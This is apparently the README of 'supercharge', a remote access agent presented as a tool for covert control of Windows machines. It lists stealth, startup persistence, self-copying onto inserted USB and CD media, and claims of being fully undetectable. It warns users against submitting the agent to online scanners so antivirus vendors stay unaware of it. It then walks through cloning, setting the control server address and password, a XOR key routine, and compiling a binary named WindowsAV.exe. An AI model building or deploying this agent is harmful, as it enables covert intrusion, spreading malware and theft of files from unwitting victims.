Do not by any means upload the Agent to online Scanners. Why? Because even if one of the engines finds the file suspicious, the service shares the result among all AV companies, allowing cyber-security firms insight on new types of malware that their engines are not currently detecting. Read here.
Project supercharge is a Remote Access Agent. The supercharge agent is mainly created to provide remote access to a Computer with Stealth and Persistence.
Feature | Detail |
---|---|
System Information | View System Information. |
Persistence | Automatically add itself to Startup when first run. |
Stealth | Automatically hide itself to a Location when first run. |
Spreading | If supercharge agent is running and a USB/CD is inserted, The agent will copy itself over into it. |
Message Box | Display a message box. |
Encrypted Connection | Your communication is encrypted with a key of your choice. |
Password Protection | Even though it's encrypted, It will authenticate with a Password hardcoded in the Agent. |
Offline Bot Database | supercharge comes with an Offline Web App you can use to easily view all Agents that ever Connected and when. |
Fully Undetectable | The Agent is fully undetectable. |
File Upload/Download | Download and upload files. |
Explore | Move around and view files. |
(NOTE : These are installed by setup script)
- Mingw cross Compiler
- Python 3
$ git clone https://github.com/quantumcore/supercharge
$ cd supercharge
$ sudo ./install.sh
- Go to supercharge/agent and open file
supercharge.hpp
EG:
nano supercharge.hpp
- Edit the Line
SERVER_HOST
andSERVER_PORT
and thePASSWORD
. EG:
#define PASSWORD "mysecretpassword"
#define SERVER_HOST "127.0.0.1"
#define SERVER_PORT 3982
Make sure the password is the same you define in supercharge.ini
. (Server side)
- Go to supercharge/agent and openfile
xor.cpp
EG:
nano xor.cpp
4 Edit line (4) which contains the Encryption key. For Example.
std::string XOR(std::string data) {
// Encryption KEY BELOW
char key[] = {'M','Y','K','E','Y'};
// DONT FORGET TO SET !
std::string output = data;
for (int i = 0; i < data.size(); i++){
output[i] = data[i] ^ key[i % (sizeof(key) / sizeof(char))];
}
return output;
}
- Compile the Agent On Windows
make
On Linux
make linux
This will generate the Supercharge agent named WindowsAV.exe
with an ICON.
- Setting the Encryption key.
Open file
kernel/infodb.py
in your text editor and edit line 31 to your encryption key. It can be anything. For Example.
$ cd supercharge
$ nano kernel/infodb.py
def xor(data):
# Encryption KEY! EDIT ME !
key = ['M','Y','K','E','Y']
# Encryption key ABOVE!
output = []
for i in range(len(data)):
xor_num = ord(data[i]) ^ ord(key[i % len(key)])
output.append(chr(xor_num))
return ''.join(output)
- Setting the Password.
Open file
supercharge.ini
and you can just simply change the values.
Fixed
- Broken Connection Problems. ✔️
- Password Authentication buffer overflow. ✔️
- Remove wchar_t functions (Old code) ✔️
- File Execution bug. ✔️
- File Download byte bug. ✔️
- Windows 10 detected as Windows 8. (Thanks to @dannyvsdev) ✔️
- WAN IP Bug.
If you would like to help me! Please do so! Also, I do not use branches because I always end up pushing to master. So, I always create another repositroy (private) for developement. So if you would like to help me, Contact me.
- File sorting in the remote file listing. ✔️
- Imrpovement of the file upload function. ✔️
- Console Updates. ✔️